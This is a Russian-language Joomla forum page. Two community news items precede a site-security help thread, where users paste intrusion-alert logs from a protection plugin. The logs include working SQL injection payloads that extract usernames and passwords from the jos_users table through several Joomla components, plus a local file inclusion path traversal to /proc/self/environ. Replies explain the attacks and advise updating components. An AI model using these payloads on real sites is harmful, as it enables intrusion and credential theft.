Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 271267 Просмотров
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Вариант один. Вычистить все и обновится до последних версий расширений и Joomla. Поменять пароли.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Вариант один. Вычистить все и обновится до последних версий расширений и Joomla. Поменять пароли.
И не забывать систематически бэкапы делать!
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Биржи ссылок и доров тоже вроде нету.
Пароли поменял, поставил двойную авторизацию в админку.
Вспомнил, что в это время пришло три письма от плагина Marcos interceptor, уже видимо после того как были залиты левые файлы. Там была попытка взлома двух компонентов, которых у меня нету и одна инъекция в ком.контент.
Тогда был не возле компа - не мог детально проверить сайты.

По JCE вопрос - в последних версиях уязвимостей нету? Или каким вы пользуетесь редактором?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Биржи ссылок и доров тоже вроде нету.
Пароли поменял, поставил двойную авторизацию в админку.
Вспомнил, что в это время пришло три письма от плагина Marcos interceptor, уже видимо после того как были залиты левые файлы. Там была попытка взлома двух компонентов, которых у меня нету и одна инъекция в ком.контент.
Тогда был не возле компа - не мог детально проверить сайты.

По JCE вопрос - в последних версиях уязвимостей нету? Или каким вы пользуетесь редактором?
в последних версиях, в паблике нету! а что с другии компонентами? чистые? не плохой маневр был бы если на ошибки прописать функцию которая вела бы логи на староннем сервере и по мере необходимости выссылала отчет на почту раз в неделю для профилактики)
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Из других компонентов:
1-ый сайт: sh404sef(последняя для 1.5), фока галлерея(последняя), акеба бекап. Модулей левых нету
2-ой сайт: sh404SEF, VirtueMart, jrecash, acymailing, JCE редактор, акеба бекап.

По поводу прописать функцию - сколько это будет стоить? Куда отсылать логи будет, вам? И в  чем преимущество, плагин марко тоже сразу высылает отчет?
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Из других компонентов:
1-ый сайт: sh404sef(последняя для 1.5), фока галлерея(последняя), акеба бекап. Модулей левых нету
2-ой сайт: sh404SEF, VirtueMart, jrecash, acymailing, JCE редактор, акеба бекап.

По поводу прописать функцию - сколько это будет стоить? Куда отсылать логи будет, вам? И в  чем преимущество, плагин марко тоже сразу высылает отчет?

На счет плагина марко не знаю, в компонентах фотоголерей знаю что есть скули, также и в VirtueMart, об остальных не знаю, если любопытство глумит то надо аналезировать код! на счет логов, куда угодно... на вашь сервер, вам в почту еще куда либо)
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
VirtueMart, JCE какой версии?
VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.
VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.
Не обезательно обновлять компонент, можно просто в коде закрыть дыры!
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

Zoblin

  • Захожу иногда
  • 73
  • 0 / 0
Marco прислал информацию - пытались сегодня вскрыть сайт на Joomla 1.5:

** Union Select [GET:tag] => 999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Table name in url [GET:tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Union Select [REQUEST:tag] => 999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Table name in url [REQUEST:tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a**PAGE / SERVER INFO*REMOTE_ADDR :46.37.166.22*HTTP_USER_AGENT :Mozilla/5.0*REQUEST_METHOD :GET*QUERY_STRING :option=com_tag&task=tag&lang=es&tag=999999.9'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users--+a** SUPERGLOBALS DUMP (sanitized)*$_GET DUMP -[option] => com_tag -[task] => tag -[lang] => es -[tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a*$_POST DUMP*$_COOKIE DUMP*$_REQUEST DUMP -[option] => com_tag -[task] => tag -[lang] => es -[tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Это ботнет, стучал и к  клиентам сегодня. Если у вас нет этого расширения то боятся нечего.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Это старая уязвимость, но на сегодняшние день очень акктуальна для необнавленных компонентов.
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Логи Marcos

** Local File Inclusion [GET:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00
** Local File Inclusion [REQUEST:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00

**PAGE / SERVER INFO


*REMOTE_ADDR :
216.70.90.155

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_ccnewsletter
 -[controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_ccnewsletter
 -[controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Тоже уязвимость от 2010 года. Обновляйте сайты, чтобы такие приколы не проходили. 100% этого компонента у вас нет.
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Вчера первый раз пришло письмо Marco's interceptor warning, из него мне мало что понятно, поэтому поначитавшись тут ужастиков решил уточнить у спецов, не опасноли это и что это вообще и какие меры предпринимать?

** Union Select [GET:tag] => 999999.9' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Table name in url [GET:tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Union Select [REQUEST:tag] => 999999.9' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Table name in url [REQUEST:tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_tag&task=tag&lang=es&tag=999999.9'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users--+a



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_tag
 -[task] => tag
 -[lang] => es
 -[tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_tag
 -[task] => tag
 -[lang] => es
 -[tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
com_tag у вас есть? пытаются взломать вас через него SQL-инъекцией нехорошие люди.
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
com_tag у вас есть? пытаются взломать вас через него SQL-инъекцией нехорошие люди.
такого com_tag у меня нет
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
люди добрые, почитав данную тему, про хулиганов с SQL-шприцами я уже понял, хотелось бы поподробнее...
« Последнее редактирование: 21.03.2013, 23:44:40 от Alex Kop »
*

ven-til

  • Захожу иногда
  • 157
  • 3 / 0
привет.
сегодня у себя в Перенаправлениях заметил ссылку:
Спойлер
[свернуть]

jos_users - понятно, а что все остальное значит?
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
такого com_tag у меня нет

Тогда не о чем беспокоиться.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
jos_users - понятно, а что все остальное значит?

Ерунда, если com_tag нет. Не обращайте внимания.
*

ven-til

  • Захожу иногда
  • 157
  • 3 / 0
Это пока ерунда.
Подозреваю в этих нехороших действиях одного необразованного клоуна.
Ранее он пытался получить доступ к моей админке решив что сайт у меня на WP.
Вот список его попыток:
wp-admin
wp-login.php
wp-trackback.php
bitrix/admin/index.php?lang=en
admin/login.php
blog/wp-trackback.php 
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
привет.
сегодня у себя в Перенаправлениях заметил ссылку:
Спойлер
[свернуть]

jos_users - понятно, а что все остальное значит?

А все остальное, это запрос к вашей MySQL db, в результате которой взломщику место вашего контента на сайте вывидется логин и пароль от админки!

Это пока ерунда.
Подозреваю в этих нехороших действиях одного необразованного клоуна.
Ранее он пытался получить доступ к моей админке решив что сайт у меня на WP.
Вот список его попыток:
wp-admin
wp-login.php
wp-trackback.php
bitrix/admin/index.php?lang=en
admin/login.php
blog/wp-trackback.php 
Да))) там походу действительно не образованный клоун был))
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Сегодня этот же, но уже Kunena опрашивается...
Спойлер
[свернуть]
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

Zoblin

  • Захожу иногда
  • 73
  • 0 / 0
Ниже попытка взлома Поиска. Насколько это страшно?
« Последнее редактирование: 22.03.2013, 10:55:45 от Zoblin »
*

Zoblin

  • Захожу иногда
  • 73
  • 0 / 0
Сегодня сразу две атаки:

** Union Select [GET:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


И еще одна:

** Union Select [GET:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [GET:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Union Select [REQUEST:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [REQUEST:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users--



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_ignitegallery
 -[task] => view
 -[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_ignitegallery
 -[task] => view
 -[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--

Прокомментируйте, пожалуйста! Спасибо!
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
у меня тоже сегодня в 9.07
** Union Select [GET:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

И на этот раз com_kunena  у меня есть
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
У ботов весна... Kunena обновить надо до 2.0.4 если старая стоит.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3851
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 3936
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 3141
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1179
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2762
Последний ответ 03.11.2020, 17:36:03
от Cedars